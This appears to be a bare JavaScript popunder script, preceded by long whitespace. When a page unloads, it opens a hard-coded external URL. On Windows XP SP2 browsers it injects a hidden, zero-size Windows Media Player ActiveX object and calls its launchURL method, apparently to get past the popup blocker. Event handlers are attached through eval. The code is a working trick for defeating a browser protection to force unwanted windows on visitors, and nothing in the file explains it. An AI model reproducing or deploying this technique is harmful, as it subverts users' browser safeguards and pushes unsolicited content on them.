


























































































var cl=0;
var isXPSP2;
var popURL=1;
function pone(){
        if(cl)return;
        cl=1;
        switch(popURL){
                case 1:popURL='http://www.teamcybermed.com/consoles/001/';break;
                case 2:exit();
        }
        if(isXPSP2){
                iie.launchURL(popURL);
        }else{
                window.open(popURL,"","scrollbars=yes,resizable=no,toolbar=no,menubar=no,status=no,location=no");
        }
}
function obj(){
        document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'></object>";
}

isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != -1);
if(isXPSP2){
        eval("window.attachEvent('onload',obj);");
        eval("window.attachEvent('onunload',pone);");
}
